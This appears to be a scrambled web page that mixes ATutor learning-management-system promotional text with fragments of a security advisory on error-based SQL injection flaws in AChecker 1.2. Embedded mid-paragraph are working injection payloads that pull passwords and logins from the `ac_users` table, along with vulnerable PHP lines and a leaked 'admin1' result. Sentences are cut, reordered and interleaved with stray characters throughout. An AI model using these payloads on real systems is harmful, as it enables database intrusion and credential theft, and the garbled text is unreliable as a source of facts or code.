Automated emails are sent to students when they are added to a course. Other key platform tools include an enrollment manager which allows instructors to import a list of students to enroll in courses, add new students to a course, and automatically generate logins and passwords for students. The content editor enables instructors to embed links or images in a page while authoring content, rearrange content within a course, add multimedia objects, include scripts and style sheets, setup tests, as well as set release dates to control when content is viewable to learners.
Instructors are provided with a selection of course tools and menu modules, which can be configured for each specific course. Instructors and educators are able to assemble, package, and redistribute instructional content, and take advantage of ATutor's social networking tools to create course networking groups to enhance class interaction. Additional learner features include a course search engine, test manager, content package viewer, links database, feedback capabilities, and more. Through ATutor's private mail inbox, discussion forums, chat rooms, and the 'User's Online' tool, students are able to communicate with other users and learners to collaborate on course projects, and share resources using the file storage utility. Educators are able to assemble, package, and distribute web-based instructional content, import prepackaged content and conduct courses online, while providing learners with an accessible, adaptive, and social learning environment.ĪTutor provides learners with a student profile for adding personal information and photos, and a ‘My Courses’ portal where they can manage the courses they are enrolled in. and(select 1 from(select count(*),concat((select (select password) from `ac_users` limit 1,1),floor(rand(0)*2))x from `information_schema`.ATutor is a free, open source learning management system (LMS) that enables small to large organizations to create eLearning content and develop online courses. and(select 1 from(select count(*),concat((select (select login) from `ac_users` limit 1,1),floor(rand(0)*2))x from `information_schema`.tables group by 2)j)ĭuplicate entry 'admin1' for key 'group_key' Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
Tested on: Microsoft Windows XP Professional SP3 (EN) $myown_patch_id) ģ5: $savant->assign('patch_row', $myownPatchesDAO->getByID($myown_patch_id)) ģ6: $savant->assign('dependent_rows', $myownPatchesDependentDAO->getByPatchID($myown_patch_id)) ģ7: $savant->assign('file_rows', $myownPatchesFilesDAO->getByPatchID($myown_patch_id)) ġ03: if (isset($_GET)) // edit existing userġ06: $savant->assign('user_row', $usersDAO->getUserByID($_GET)) ġ07: $savant->assign('show_password', false) SQL queries by injecting arbitrary SQL code.Ģ0: if (!isset($_REQUEST))Ģ6: $myown_patch_id = $_REQUEST Ģ8: $myownPatchesDAO = new MyownPatchesDAO() Ģ9: $myownPatchesDependentDAO = new MyownPatchesDependentDAO() ģ0: $myownPatchesFilesDAO = new MyownPatchesFilesDAO() ģ3: $savant->assign('url', dirname($_SERVER). Sanitised before being used in SQL queries. It can be used to review the accessibility of Web pages based on a varietyĭesc: Input passed via the parameter 'myown_patch_id' in '/updater/patch_edit.php'Īnd the parameter 'id' in '/user/user_create_edit.php' script is not properly ATutor is also cited in numerous technical reviews and scholarly articles and many third-party extensions have been developed and distributed for use with the software. Summary: AChecker is an open source Web accessibility evaluation tool. This aspect of ATutor has been affirmed in at least one University-published review of the software. Vendor: ATutor (Inclusive Design Institute) AChecker 1.2 Multiple Error-Based SQL Injection vulnerabilities